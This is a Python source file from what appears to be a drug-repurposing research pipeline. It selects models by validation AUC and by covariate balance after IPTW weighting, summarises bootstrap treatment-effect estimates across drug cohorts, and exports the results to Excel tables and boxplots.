def split_shell_file(fname, divide=2, skip_first=1):
f = open(fname, 'r')
content_list = f.readlines()
n = len(content_list)
n_d = np.ceil((n - skip_first) / divide)
seg = [0, ] + [int(i * n_d + skip_first) for i in range(1, divide)] + [n]
for i in range(divide):
fout_name = fname.split('.')
fout_name = ''.join(fout_name[:-1]) + '-' + str(i) + '.' + fout_name[-1]
fout = open(fout_name, 'w')
for l in content_list[seg[i]:seg[i + 1]]:
fout.write(l)
fout.close()
print('dump done')
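An in-memory sketch of the segmentation performed by split_shell_file above (no files written; the line list is made up): the first skip_first lines stay in part 0 and the remaining lines are divided into near-equal chunks.

```python
# Segment boundaries as computed in split_shell_file, applied to a toy list.
import numpy as np

lines = ['#!/bin/bash\n'] + ['cmd {}\n'.format(i) for i in range(10)]
divide, skip_first = 2, 1
n = len(lines)
n_d = np.ceil((n - skip_first) / divide)
seg = [0] + [int(i * n_d + skip_first) for i in range(1, divide)] + [n]
parts = [lines[seg[i]:seg[i + 1]] for i in range(divide)]
print([len(p) for p in parts])  # [6, 5]
```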
def results_model_selection_for_ml(cohort_dir_name, model, drug_name, niter=50):
cohort_size = pickle.load(open(r'../ipreprocess/output_marketscan/{}/cohorts_size.pkl'.format(cohort_dir_name), 'rb'))
name_cnt = sorted(cohort_size.items(), key=lambda x: x[1], reverse=True)
drug_list_all = [drug.split('.')[0] for drug, cnt in name_cnt]
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
drug_in_dir = set([x for x in os.listdir(dirname) if x.isdigit()])
drug_list = [x for x in drug_list_all if x in drug_in_dir] # in order
check_and_mkdir(dirname + 'results/')
for drug in drug_list:
results = []
for ctrl_type in ['random', 'atc']:
for seed in range(0, niter):
fname = dirname + drug + "/{}_S{}D200C{}_{}".format(drug, seed, ctrl_type, model)
                try:
                    df = pd.read_csv(fname + '_ALL-model-select.csv')
                except FileNotFoundError:
                    print('No file exists: ', fname + '_ALL-model-select.csv')
                    continue
# 1. selected by AUC
dftmp = df.sort_values(by=['val_auc', 'i'], ascending=[False, True])
val_auc = dftmp.iloc[0, dftmp.columns.get_loc('val_auc')]
val_auc_nsmd = dftmp.iloc[0, dftmp.columns.get_loc('all_n_unbalanced_feat_iptw')]
val_auc_testauc = dftmp.iloc[0, dftmp.columns.get_loc('test_auc')]
# 2. selected by val_max_smd_iptw
dftmp = df.sort_values(by=['val_max_smd_iptw', 'i'], ascending=[True, True])
val_maxsmd = dftmp.iloc[0, dftmp.columns.get_loc('val_max_smd_iptw')]
val_maxsmd_nsmd = dftmp.iloc[0, dftmp.columns.get_loc('all_n_unbalanced_feat_iptw')]
val_maxsmd_testauc = dftmp.iloc[0, dftmp.columns.get_loc('test_auc')]
# 3. selected by val_n_unbalanced_feat_iptw
dftmp = df.sort_values(by=['val_n_unbalanced_feat_iptw', 'i'], ascending=[True, False]) # [True, True]
val_nsmd = dftmp.iloc[0, dftmp.columns.get_loc('val_n_unbalanced_feat_iptw')]
val_nsmd_nsmd = dftmp.iloc[0, dftmp.columns.get_loc('all_n_unbalanced_feat_iptw')]
val_nsmd_testauc = dftmp.iloc[0, dftmp.columns.get_loc('test_auc')]
# 4. selected by train_max_smd_iptw
dftmp = df.sort_values(by=['train_max_smd_iptw', 'i'], ascending=[True, True])
train_maxsmd = dftmp.iloc[0, dftmp.columns.get_loc('train_max_smd_iptw')]
train_maxsmd_nsmd = dftmp.iloc[0, dftmp.columns.get_loc('all_n_unbalanced_feat_iptw')]
train_maxsmd_testauc = dftmp.iloc[0, dftmp.columns.get_loc('test_auc')]
# 5. selected by train_n_unbalanced_feat_iptw
dftmp = df.sort_values(by=['train_n_unbalanced_feat_iptw', 'i'],
ascending=[True, False]) # [True, True]
train_nsmd = dftmp.iloc[0, dftmp.columns.get_loc('train_n_unbalanced_feat_iptw')]
train_nsmd_nsmd = dftmp.iloc[0, dftmp.columns.get_loc('all_n_unbalanced_feat_iptw')]
train_nsmd_testauc = dftmp.iloc[0, dftmp.columns.get_loc('test_auc')]
# 6. selected by trainval_max_smd_iptw
dftmp = df.sort_values(by=['trainval_max_smd_iptw', 'i'], ascending=[True, True])
trainval_maxsmd = dftmp.iloc[0, dftmp.columns.get_loc('trainval_max_smd_iptw')]
trainval_maxsmd_nsmd = dftmp.iloc[0, dftmp.columns.get_loc('all_n_unbalanced_feat_iptw')]
trainval_maxsmd_testauc = dftmp.iloc[0, dftmp.columns.get_loc('test_auc')]
# 7. selected by trainval_n_unbalanced_feat_iptw
dftmp = df.sort_values(by=['trainval_n_unbalanced_feat_iptw', 'i'],
ascending=[True, False]) # [True, True]
trainval_nsmd = dftmp.iloc[0, dftmp.columns.get_loc('trainval_n_unbalanced_feat_iptw')]
trainval_nsmd_nsmd = dftmp.iloc[0, dftmp.columns.get_loc('all_n_unbalanced_feat_iptw')]
trainval_nsmd_testauc = dftmp.iloc[0, dftmp.columns.get_loc('test_auc')]
# 8. FINAL: selected by trainval_n_unbalanced_feat_iptw + val AUC
dftmp = df.sort_values(by=['trainval_n_unbalanced_feat_iptw', 'val_auc'], ascending=[True, False])
trainval_final_nsmd = dftmp.iloc[0, dftmp.columns.get_loc('trainval_n_unbalanced_feat_iptw')]
trainval_final_valauc = dftmp.iloc[0, dftmp.columns.get_loc('val_auc')]
trainval_final_finalnsmd = dftmp.iloc[0, dftmp.columns.get_loc('all_n_unbalanced_feat_iptw')]
trainval_final_testnauc = dftmp.iloc[0, dftmp.columns.get_loc('test_auc')]
results.append(["{}_S{}D200C{}_{}".format(drug, seed, ctrl_type, model), ctrl_type,
val_auc, val_auc_nsmd, val_auc_testauc,
val_maxsmd, val_maxsmd_nsmd, val_maxsmd_testauc,
val_nsmd, val_nsmd_nsmd, val_nsmd_testauc,
train_maxsmd, train_maxsmd_nsmd, train_maxsmd_testauc,
train_nsmd, train_nsmd_nsmd, train_nsmd_testauc,
trainval_maxsmd, trainval_maxsmd_nsmd, trainval_maxsmd_testauc,
trainval_nsmd, trainval_nsmd_nsmd, trainval_nsmd_testauc,
trainval_final_nsmd, trainval_final_valauc, trainval_final_finalnsmd,
trainval_final_testnauc,
])
rdf = pd.DataFrame(results, columns=['fname', 'ctrl_type',
"val_auc", "val_auc_nsmd", "val_auc_testauc",
"val_maxsmd", "val_maxsmd_nsmd", "val_maxsmd_testauc",
"val_nsmd", "val_nsmd_nsmd", "val_nsmd_testauc",
"train_maxsmd", "train_maxsmd_nsmd", "train_maxsmd_testauc",
"train_nsmd", "train_nsmd_nsmd", "train_nsmd_testauc",
"trainval_maxsmd", "trainval_maxsmd_nsmd", "trainval_maxsmd_testauc",
"trainval_nsmd", "trainval_nsmd_nsmd", "trainval_nsmd_testauc",
"trainval_final_nsmd", "trainval_final_valauc", "trainval_final_finalnsmd",
"trainval_final_testnauc",
])
rdf.to_csv(dirname + 'results/' + drug + '_model_selection.csv')
for t in ['random', 'atc', 'all']:
# fig = plt.figure(figsize=(20, 15))
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(20, 18))
if t != 'all':
idx = rdf['ctrl_type'] == t
else:
idx = rdf['ctrl_type'].notna()
boxplot = rdf[idx].boxplot(column=["val_auc_nsmd", "val_maxsmd_nsmd", "val_nsmd_nsmd", "train_maxsmd_nsmd",
"train_nsmd_nsmd", "trainval_maxsmd_nsmd", "trainval_nsmd_nsmd",
"trainval_final_finalnsmd"], rot=25, fontsize=15, ax=ax1)
ax1.axhline(y=5, color='r', linestyle='-')
boxplot.set_title("{}-{}_S{}D200C{}_{}".format(drug, drug_name.get(drug)[:30], '0-19', t, model), fontsize=25)
# plt.xlabel("Model selection methods", fontsize=15)
            ax1.set_ylabel("#unbalanced_feat_iptw of bootstrap experiments", fontsize=20)
# fig.savefig(dirname + 'results/' + drug + '_model_selection_boxplot-{}-allnsmd.png'.format(t))
# plt.show()
# fig = plt.figure(figsize=(20, 15))
boxplot = rdf[idx].boxplot(column=["val_auc_testauc", "val_maxsmd_testauc", "val_nsmd_testauc",
"train_maxsmd_testauc", "train_nsmd_testauc", "trainval_maxsmd_testauc",
"trainval_nsmd_testauc", 'trainval_final_testnauc'], rot=25, fontsize=15,
ax=ax2)
# plt.axhline(y=0.5, color='r', linestyle='-')
# boxplot.set_title("{}-{}_S{}D200C{}_{}".format(drug, drug_name.get(drug), '0-19', t, model), fontsize=25)
ax2.set_xlabel("Model selection methods", fontsize=20)
            ax2.set_ylabel("test_auc of bootstrap experiments", fontsize=20)
plt.tight_layout()
fig.savefig(dirname + 'results/' + drug + '_model_selection_boxplot-{}.png'.format(t))
# plt.clf()
plt.close()
print()
def results_model_selection_for_ml_step2(cohort_dir_name, model, drug_name):
cohort_size = pickle.load(open(r'../ipreprocess/output_marketscan/{}/cohorts_size.pkl'.format(cohort_dir_name), 'rb'))
name_cnt = sorted(cohort_size.items(), key=lambda x: x[1], reverse=True)
drug_list_all = [drug.split('.')[0] for drug, cnt in name_cnt]
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
drug_in_dir = set([x for x in os.listdir(dirname) if x.isdigit()])
drug_list = [x for x in drug_list_all if x in drug_in_dir] # in order
check_and_mkdir(dirname + 'results/')
writer = pd.ExcelWriter(dirname + 'results/summarized_model_selection_{}.xlsx'.format(model), engine='xlsxwriter')
for t in ['random', 'atc', 'all']:
results = []
for drug in drug_list:
rdf = pd.read_csv(dirname + 'results/' + drug + '_model_selection.csv')
if t != 'all':
idx = rdf['ctrl_type'] == t
else:
idx = rdf['ctrl_type'].notna()
r = [drug, drug_name.get(drug, '')]
col_name = ['drug', 'drug_name']
# zip(["val_auc_nsmd", "val_maxsmd_nsmd", "val_nsmd_nsmd", "train_maxsmd_nsmd",
# "train_nsmd_nsmd", "trainval_maxsmd_nsmd", "trainval_nsmd_nsmd",
# "trainval_final_finalnsmd"],
# ["val_auc_testauc", "val_maxsmd_testauc", "val_nsmd_testauc",
# "train_maxsmd_testauc", "train_nsmd_testauc", "trainval_maxsmd_testauc",
# "trainval_nsmd_testauc", 'trainval_final_testnauc'])
for c1, c2 in zip(["val_auc_nsmd", "val_maxsmd_nsmd", "trainval_final_finalnsmd"],
["val_auc_testauc", "val_maxsmd_testauc", 'trainval_final_testnauc']):
nsmd = rdf.loc[idx, c1]
auc = rdf.loc[idx, c2]
nsmd_med = IQR(nsmd)[0]
nsmd_iqr = IQR(nsmd)[1:]
nsmd_mean = nsmd.mean()
nsmd_mean_ci, nsmd_mean_std = bootstrap_mean_ci(nsmd, alpha=0.05)
success_rate = (nsmd <= MAX_NO_UNBALANCED_FEATURE).mean()
success_rate_ci, success_rate_std = bootstrap_mean_ci(nsmd <= MAX_NO_UNBALANCED_FEATURE, alpha=0.05)
auc_med = IQR(auc)[0]
auc_iqr = IQR(auc)[1:]
auc_mean = auc.mean()
auc_mean_ci, auc_mean_std = bootstrap_mean_ci(auc, alpha=0.05)
r.extend([nsmd_med, nsmd_iqr,
nsmd_mean, nsmd_mean_ci, nsmd_mean_std,
success_rate, success_rate_ci, success_rate_std,
auc_med, auc_iqr, auc_mean, auc_mean_ci, auc_mean_std])
col_name.extend(
["nsmd_med-" + c1, "nsmd_iqr-" + c1, "nsmd_mean-" + c1, "nsmd_mean_ci-" + c1, "nsmd_mean_std-" + c1,
"success_rate-" + c1, "success_rate_ci-" + c1, "success_rate_std-" + c1,
"auc_med-" + c2, "auc_iqr-" + c2, "auc_mean-" + c2, "auc_mean_ci-" + c2, "auc_mean_std-" + c2])
            x = np.array(rdf.loc[idx, "trainval_final_finalnsmd"] <= MAX_NO_UNBALANCED_FEATURE, dtype=float)
            y1 = np.array(rdf.loc[idx, "val_auc_nsmd"] <= MAX_NO_UNBALANCED_FEATURE, dtype=float)
            y2 = np.array(rdf.loc[idx, "val_maxsmd_nsmd"] <= MAX_NO_UNBALANCED_FEATURE, dtype=float)
p1, test_orig1 = bootstrap_mean_pvalue_2samples(x, y1)
p2, test_orig2 = bootstrap_mean_pvalue_2samples(x, y2)
p3, test_orig3 = bootstrap_mean_pvalue_2samples(y1, y2)
r.extend([p1, test_orig1[1], p2, test_orig2[1], p3, test_orig3[1]])
col_name.extend(
['pboot-succes-final-vs-auc', 'p-succes-final-vs-auc',
'pboot-succes-final-vs-maxsmd', 'p-succes-final-vs-maxsmd',
'pboot-succes-auc-vs-maxsmd', 'p-succes-auc-vs-maxsmd'])
results.append(r)
df = pd.DataFrame(results, columns=col_name)
df.to_excel(writer, sheet_name=t)
writer.save()
print()
def results_model_selection_for_ml_step2More(cohort_dir_name, model, drug_name):
cohort_size = pickle.load(open(r'../ipreprocess/output_marketscan/{}/cohorts_size.pkl'.format(cohort_dir_name), 'rb'))
name_cnt = sorted(cohort_size.items(), key=lambda x: x[1], reverse=True)
drug_list_all = [drug.split('.')[0] for drug, cnt in name_cnt]
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
drug_in_dir = set([x for x in os.listdir(dirname) if x.isdigit()])
drug_list = [x for x in drug_list_all if x in drug_in_dir] # in order
check_and_mkdir(dirname + 'results/')
writer = pd.ExcelWriter(dirname + 'results/summarized_model_selection_{}-More.xlsx'.format(model),
engine='xlsxwriter')
for t in ['random', 'atc', 'all']:
results = []
for drug in drug_list:
rdf = pd.read_csv(dirname + 'results/' + drug + '_model_selection.csv')
if t != 'all':
idx = rdf['ctrl_type'] == t
else:
idx = rdf['ctrl_type'].notna()
r = [drug, drug_name.get(drug, '')]
col_name = ['drug', 'drug_name']
for c1, c2 in zip(
["val_auc_nsmd", "val_maxsmd_nsmd", "val_nsmd_nsmd", "train_maxsmd_nsmd",
"train_nsmd_nsmd", "trainval_maxsmd_nsmd", "trainval_nsmd_nsmd", "trainval_final_finalnsmd"],
["val_auc_testauc", "val_maxsmd_testauc", "val_nsmd_testauc", "train_maxsmd_testauc",
"train_nsmd_testauc", "trainval_maxsmd_testauc", "trainval_nsmd_testauc",
'trainval_final_testnauc']):
# for c1, c2 in zip(["val_auc_nsmd", "val_maxsmd_nsmd", "val_nsmd_nsmd", "train_maxsmd_nsmd", "train_nsmd_nsmd", "trainval_final_finalnsmd"],
# ["val_auc_testauc", "val_maxsmd_testauc", 'trainval_final_testnauc']):
nsmd = rdf.loc[idx, c1]
auc = rdf.loc[idx, c2]
nsmd_med = IQR(nsmd)[0]
nsmd_iqr = IQR(nsmd)[1:]
nsmd_mean = nsmd.mean()
nsmd_mean_ci, nsmd_mean_std = bootstrap_mean_ci(nsmd, alpha=0.05)
success_rate = (nsmd <= MAX_NO_UNBALANCED_FEATURE).mean()
success_rate_ci, success_rate_std = bootstrap_mean_ci(nsmd <= MAX_NO_UNBALANCED_FEATURE, alpha=0.05)
auc_med = IQR(auc)[0]
auc_iqr = IQR(auc)[1:]
auc_mean = auc.mean()
auc_mean_ci, auc_mean_std = bootstrap_mean_ci(auc, alpha=0.05)
r.extend([nsmd_med, nsmd_iqr,
nsmd_mean, nsmd_mean_ci, nsmd_mean_std,
success_rate, success_rate_ci, success_rate_std,
auc_med, auc_iqr, auc_mean, auc_mean_ci, auc_mean_std])
col_name.extend(
["nsmd_med-" + c1, "nsmd_iqr-" + c1, "nsmd_mean-" + c1, "nsmd_mean_ci-" + c1, "nsmd_mean_std-" + c1,
"success_rate-" + c1, "success_rate_ci-" + c1, "success_rate_std-" + c1,
"auc_med-" + c2, "auc_iqr-" + c2, "auc_mean-" + c2, "auc_mean_ci-" + c2, "auc_mean_std-" + c2])
            x = np.array(rdf.loc[idx, "trainval_final_finalnsmd"] <= MAX_NO_UNBALANCED_FEATURE, dtype=float)
            y1 = np.array(rdf.loc[idx, "val_auc_nsmd"] <= MAX_NO_UNBALANCED_FEATURE, dtype=float)
            y2 = np.array(rdf.loc[idx, "val_maxsmd_nsmd"] <= MAX_NO_UNBALANCED_FEATURE, dtype=float)
p1, test_orig1 = bootstrap_mean_pvalue_2samples(x, y1)
p2, test_orig2 = bootstrap_mean_pvalue_2samples(x, y2)
p3, test_orig3 = bootstrap_mean_pvalue_2samples(y1, y2)
r.extend([p1, test_orig1[1], p2, test_orig2[1], p3, test_orig3[1]])
col_name.extend(
['pboot-succes-final-vs-auc', 'p-succes-final-vs-auc',
'pboot-succes-final-vs-maxsmd', 'p-succes-final-vs-maxsmd',
'pboot-succes-auc-vs-maxsmd', 'p-succes-auc-vs-maxsmd'])
col = ['val_auc_nsmd', 'val_maxsmd_nsmd', 'val_nsmd_nsmd',
'train_maxsmd_nsmd', 'train_nsmd_nsmd',
'trainval_maxsmd_nsmd', 'trainval_nsmd_nsmd'] # ,'success_rate-trainval_final_finalnsmd']
for c in col:
                y = np.array(rdf.loc[idx, c] <= MAX_NO_UNBALANCED_FEATURE, dtype=float)
p, test_orig = bootstrap_mean_pvalue_2samples(x, y)
r.append(test_orig[1])
col_name.append('p-succes-fvs-' + c)
results.append(r)
df = pd.DataFrame(results, columns=col_name)
df.to_excel(writer, sheet_name=t)
writer.save()
print()
def results_ATE_for_ml(cohort_dir_name, model, niter=50):
cohort_size = pickle.load(open(r'../ipreprocess/output_marketscan/{}/cohorts_size.pkl'.format(cohort_dir_name), 'rb'))
name_cnt = sorted(cohort_size.items(), key=lambda x: x[1], reverse=True)
drug_list_all = [drug.split('.')[0] for drug, cnt in name_cnt]
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
drug_in_dir = set([x for x in os.listdir(dirname) if x.isdigit()])
drug_list = [x for x in drug_list_all if x in drug_in_dir] # in order
check_and_mkdir(dirname + 'results/')
for drug in drug_list:
results = []
for ctrl_type in ['random', 'atc']:
for seed in range(0, niter):
fname = dirname + drug + "/{}_S{}D200C{}_{}".format(drug, seed, ctrl_type, model)
                try:
                    df = pd.read_csv(fname + '_results.csv')
                except FileNotFoundError:
                    print('No file exists: ', fname + '_results.csv')
                    continue
r = df.loc[3, :]
for c in ["KM_time_points", "KM1_original", "KM0_original", "KM1-0_original",
"KM1_IPTW", "KM0_IPTW", "KM1-0_IPTW"]:
r.loc[c] = stringlist_2_list(r.loc[c])[-1]
r = pd.Series(["{}_S{}D200C{}_{}".format(drug, seed, ctrl_type, model), ctrl_type],
index=['fname', 'ctrl_type']).append(r)
results.append(r)
rdf = pd.DataFrame(results)
rdf.to_excel(dirname + 'results/' + drug + '_results.xlsx')
print('Done')
def results_ATE_for_ml_step2(cohort_dir_name, model, drug_name):
cohort_size = pickle.load(open(r'../ipreprocess/output_marketscan/{}/cohorts_size.pkl'.format(cohort_dir_name), 'rb'))
name_cnt = sorted(cohort_size.items(), key=lambda x: x[1], reverse=True)
drug_list_all = [drug.split('.')[0] for drug, cnt in name_cnt]
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
drug_in_dir = set([x for x in os.listdir(dirname) if x.isdigit()])
drug_list = [x for x in drug_list_all if x in drug_in_dir] # in order
check_and_mkdir(dirname + 'results/')
writer = pd.ExcelWriter(dirname + 'results/summarized_IPTW_ATE_{}.xlsx'.format(model), engine='xlsxwriter')
for t in ['random', 'atc', 'all']:
results = []
for drug in drug_list:
rdf = pd.read_excel(dirname + 'results/' + drug + '_results.xlsx')
if t != 'all':
idx_all = (rdf['ctrl_type'] == t)
else:
idx_all = (rdf['ctrl_type'].notna())
# Only select balanced trial
idx = idx_all & (rdf['n_unbalanced_feature_IPTW'] <= MAX_NO_UNBALANCED_FEATURE)
print('drug: ', drug, drug_name.get(drug, ''), t, 'support:', idx.sum())
r = [drug, drug_name.get(drug, ''), idx_all.sum(), idx.sum()]
col_name = ['drug', 'drug_name', 'niters', 'support']
for c in ["n_treat", "n_ctrl", "n_feature"]: # , 'HR_IPTW', 'HR_IPTW_CI'
nv = rdf.loc[idx, c]
nv_mean = nv.mean()
r.append(nv_mean)
col_name.append(c)
nv = rdf.loc[idx_all, c]
nv_mean = nv.mean()
r.append(nv_mean)
col_name.append(c + '-uab')
for c in ["n_unbalanced_feature", "n_unbalanced_feature_IPTW"]: # , 'HR_IPTW', 'HR_IPTW_CI'
nv = rdf.loc[idx, c]
if len(nv) > 0:
med = IQR(nv)[0]
iqr = IQR(nv)[1:]
mean = nv.mean()
mean_ci, _ = bootstrap_mean_ci(nv, alpha=0.05)
r.extend([med, iqr, mean, mean_ci])
else:
r.extend([np.nan, np.nan, np.nan, np.nan])
col_name.extend(["med-" + c, "iqr-" + c, "mean-" + c, "mean_ci-" + c])
nv = rdf.loc[idx_all, c]
if len(nv) > 0:
med = IQR(nv)[0]
iqr = IQR(nv)[1:]
mean = nv.mean()
mean_ci, _ = bootstrap_mean_ci(nv, alpha=0.05)
r.extend([med, iqr, mean, mean_ci])
else:
r.extend([np.nan, np.nan, np.nan, np.nan])
col_name.extend(
["med-" + c + '-uab', "iqr-" + c + '-uab', "mean-" + c + '-uab', "mean_ci-" + c + '-uab'])
for c in ["ATE_original", "ATE_IPTW", "KM1-0_original", "KM1-0_IPTW", 'HR_ori', 'HR_IPTW']:
if c not in rdf.columns:
continue
nv = rdf.loc[idx, c]
if len(nv) > 0:
med = IQR(nv)[0]
iqr = IQR(nv)[1:]
mean = nv.mean()
mean_ci, _ = bootstrap_mean_ci(nv, alpha=0.05)
if 'HR' in c:
p, _ = bootstrap_mean_pvalue(nv, expected_mean=1)
else:
p, _ = bootstrap_mean_pvalue(nv, expected_mean=0)
r.extend([med, iqr, mean, mean_ci, p])
else:
r.extend([np.nan, np.nan, np.nan, np.nan, np.nan])
col_name.extend(["med-" + c, "iqr-" + c, "mean-" + c, "mean_ci-" + c, 'pvalue-' + c])
if 'HR_ori_CI' in rdf.columns:
r.append(';'.join(rdf.loc[idx, 'HR_ori_CI']))
col_name.append('HR_ori_CI')
r.append(';'.join(rdf.loc[idx, 'HR_IPTW_CI']))
col_name.append('HR_IPTW_CI')
results.append(r)
df = pd.DataFrame(results, columns=col_name)
df.to_excel(writer, sheet_name=t)
writer.save()
print()
def results_ATE_for_ml_step3_finalInfo(cohort_dir_name, model):
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
df_all = pd.read_excel(dirname + 'results/summarized_IPTW_ATE_{}.xlsx'.format(model), sheet_name=None, dtype={'drug':str})
writer = pd.ExcelWriter(dirname + 'results/summarized_IPTW_ATE_{}_finalInfo.xlsx'.format(model),
engine='xlsxwriter')
for sheet in ['random', 'atc', 'all']:
df = df_all[sheet]
# Only select drugs with selection criteria trial
# 1. minimum support set 10, may choose 20 later
# 2. p value < 0.05
idx = (df['support'] >= 10) & (df['pvalue-KM1-0_IPTW'] <= 0.05)
df_sort = df.loc[idx, :].sort_values(by=['mean-KM1-0_IPTW'], ascending=[False])
df_final = df_sort[
['drug', 'drug_name', 'niters', 'support', 'n_treat', 'n_ctrl', 'n_feature',
'mean-n_unbalanced_feature', 'mean_ci-n_unbalanced_feature',
'mean-n_unbalanced_feature_IPTW', 'mean_ci-n_unbalanced_feature_IPTW',
# 'mean-ATE_original', 'mean_ci-ATE_original', 'pvalue-ATE_original',
# 'mean-ATE_IPTW', 'mean_ci-ATE_IPTW', 'pvalue-ATE_IPTW',
# 'mean-KM1-0_original', 'mean_ci-KM1-0_original', 'pvalue-KM1-0_original',
'mean-KM1-0_IPTW', 'mean_ci-KM1-0_IPTW', 'pvalue-KM1-0_IPTW',
'mean-HR_IPTW', 'mean_ci-HR_IPTW', 'pvalue-HR_IPTW']]
df_final['n_ctrl'] = df_final['n_ctrl'].apply(
lambda x: '{:.1f}'.format(x))
df_final['mean-n_unbalanced_feature'] = df_final['mean-n_unbalanced_feature'].apply(
lambda x: '{:.1f}'.format(x))
df_final['mean_ci-n_unbalanced_feature'] = df_final['mean_ci-n_unbalanced_feature'].apply(
lambda x: stringlist_2_str(x, False, 1))
df_final['mean-n_unbalanced_feature_IPTW'] = df_final['mean-n_unbalanced_feature_IPTW'].apply(
lambda x: '{:.1f}'.format(x))
df_final['mean_ci-n_unbalanced_feature_IPTW'] = df_final['mean_ci-n_unbalanced_feature_IPTW'].apply(
lambda x: stringlist_2_str(x, False, 1))
df_final['mean-KM1-0_IPTW'] = df_final['mean-KM1-0_IPTW'].apply(
lambda x: '{:.1f}'.format(x * 100))
df_final['mean_ci-KM1-0_IPTW'] = df_final['mean_ci-KM1-0_IPTW'].apply(
lambda x: stringlist_2_str(x, True, 1))
df_final['mean-HR_IPTW'] = df_final['mean-HR_IPTW'].apply(
lambda x: '{:.2f}'.format(x))
df_final['mean_ci-HR_IPTW'] = df_final['mean_ci-HR_IPTW'].apply(
lambda x: stringlist_2_str(x, False, 2))
df_final.to_excel(writer, sheet_name=sheet)
writer.save()
print('Done results_ATE_for_ml_step3_finalInfo')
def combine_ate_final_LR_with(cohort_dir_name, model):
dirname = r'output_marketscan/{}/LR/'.format(cohort_dir_name)
df_lr = pd.read_excel(dirname + 'results/summarized_IPTW_ATE_{}_finalInfo.xlsx'.format('LR'), sheet_name=None,
dtype=str)
df_other = pd.read_excel(r'output_marketscan/{}/{}/'.format(cohort_dir_name, model) +
'results/summarized_IPTW_ATE_{}_finalInfo.xlsx'.format(model), sheet_name=None, dtype=str)
writer = pd.ExcelWriter(dirname + 'results/summarized_IPTW_ATE_LR_finalInfo_cat_{}.xlsx'.format(model),
engine='xlsxwriter')
writer2 = pd.ExcelWriter(dirname + 'results/summarized_IPTW_ATE_LR_finalInfo_outerjoin_{}.xlsx'.format(model),
engine='xlsxwriter')
col_name = ['drug', 'Drug', 'Model', 'niters', 'Support', 'Treat', 'Ctrl',
'n_feature', ' Unbalanced', 'Unbalanced IPTW', 'KM', 'HR']
def return_select_content(key, row, null_model=''):
data = [key, ]
col1 = ['drug_name', 'Model', 'niters', 'support', 'n_treat', 'n_ctrl',
'n_feature', 'mean-n_unbalanced_feature', 'mean-n_unbalanced_feature_IPTW']
if null_model:
for c in col1:
data.append(row[c])
data[2] = null_model.upper()
data[4] = 0
data[5] = data[6] = data[7] = data[8] = data[9] = np.nan
data.append(np.nan)
data.append(np.nan)
else:
for c in col1:
data.append(row[c])
data.append(row['mean-KM1-0_IPTW'] + ' (' + row['mean_ci-KM1-0_IPTW'] + ')')
data.append(row['mean-HR_IPTW'] + ' (' + row['mean_ci-HR_IPTW'] + ')')
return data
for sheet in ['random', 'atc', 'all']:
df1 = df_lr[sheet]
df1['Model'] = 'lr'
df2 = df_other[sheet]
df2['Model'] = 'lstm'
df_outer = df1.join(df2.set_index('drug'), lsuffix='', rsuffix='_{}'.format(model), on='drug', how='outer')
df_outer.to_excel(writer2, sheet_name=sheet)
df1 = df1.set_index('drug')
df2 = df2.set_index('drug')
data = []
for key, row in df1.iterrows():
data.append(return_select_content(key, row))
if key in df2.index:
data.append(return_select_content(key, df2.loc[key, :]))
else:
data.append(return_select_content(key, row, null_model=model))
df_final = pd.DataFrame(data=data, columns=col_name)
df_final.to_excel(writer, sheet_name=sheet)
writer.save()
writer2.save()
    print('Done combine_ate_final_LR_with')
def check_drug_name_code():
df = pd.read_excel(r'../data/repurposed_AD_under_trials_20200227.xlsx', dtype=str)
rx_df = pd.read_csv(r'../ipreprocess/output/save_cohort_all_loose/cohort_all_name_size_positive_loose.csv',
index_col='cohort_name', dtype=str)
gpi_df = pd.read_csv(r'../ipreprocess/output_marketscan/save_cohort_all_loose/cohort_all_name_size_positive.csv',
index_col='cohort_name', dtype=str)
df['rx_drug_name'] = ''
df['rx_n_patients'] = ''
df['rx_n_pos'] = ''
df['rx_pos_ratio'] = ''
df['gpi_drug_name'] = ''
df['gpi_n_patients'] = ''
df['gpi_n_pos'] = ''
df['gpi_pos_ratio'] = ''
for index, row in df.iterrows():
rx = row['rxcui']
gpi = row['gpi']
# print(index, row)
if pd.notna(rx):
rx = [x + '.pkl' for x in re.split('[,;+]', rx)]
else:
rx = []
if pd.notna(gpi):
gpi = [x + '.pkl' for x in re.split('[,;+]', gpi)]
else:
gpi = []
for r in rx:
if r in rx_df.index:
df.loc[index, 'rx_drug_name'] += ('+' + rx_df.loc[r, 'drug_name'])
df.loc[index, 'rx_n_patients'] += ('+' + rx_df.loc[r, 'n_patients'])
df.loc[index, 'rx_n_pos'] += ('+' + rx_df.loc[r, 'n_pos'])
df.loc[index, 'rx_pos_ratio'] += ('+' + rx_df.loc[r, 'pos_ratio'])
for r in gpi:
if r in gpi_df.index:
df.loc[index, 'gpi_drug_name'] += ('+' + gpi_df.loc[r, 'drug_name'])
df.loc[index, 'gpi_n_patients'] += ('+' + gpi_df.loc[r, 'n_patients'])
df.loc[index, 'gpi_n_pos'] += ('+' + gpi_df.loc[r, 'n_pos'])
df.loc[index, 'gpi_pos_ratio'] += ('+' + gpi_df.loc[r, 'pos_ratio'])
df.to_excel(r'../data/repurposed_AD_under_trials_20200227-CHECK.xlsx')
return df
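# check_drug_name_code splits each multi-code cell on ',', ';' or '+' and
# appends '.pkl' so every code matches the cohort file index. The same parsing
# step as a standalone helper (the name split_codes is illustrative; the
# source inlines this logic):

```python
import re

def split_codes(cell):
    """Split a multi-code cell on ',', ';' or '+' and append '.pkl' so each
    code matches the cohort file index."""
    if not cell:
        return []
    return [x + '.pkl' for x in re.split('[,;+]', cell)]
```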
def bar_plot_model_selection(cohort_dir_name, model, contrl_type='random', dump=True, colorful=True):
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
dfall = pd.read_excel(dirname + 'results/summarized_model_selection_{}.xlsx'.format(model), sheet_name=contrl_type)
idx = dfall['success_rate-trainval_final_finalnsmd'] >= MIN_SUCCESS_RATE # 0.1
idx_auc = dfall['success_rate-val_auc_nsmd'] >= MIN_SUCCESS_RATE # 0.1
idx_smd = dfall['success_rate-val_maxsmd_nsmd'] >= MIN_SUCCESS_RATE # 0.1
print('Total drug trials: ', len(idx))
print(r"#df['success_rate-trainval_final_finalnsmd'] >= MIN_SUCCESS_RATE: ", idx.sum(), '({:.2f}%)'.format(idx.mean() * 100))
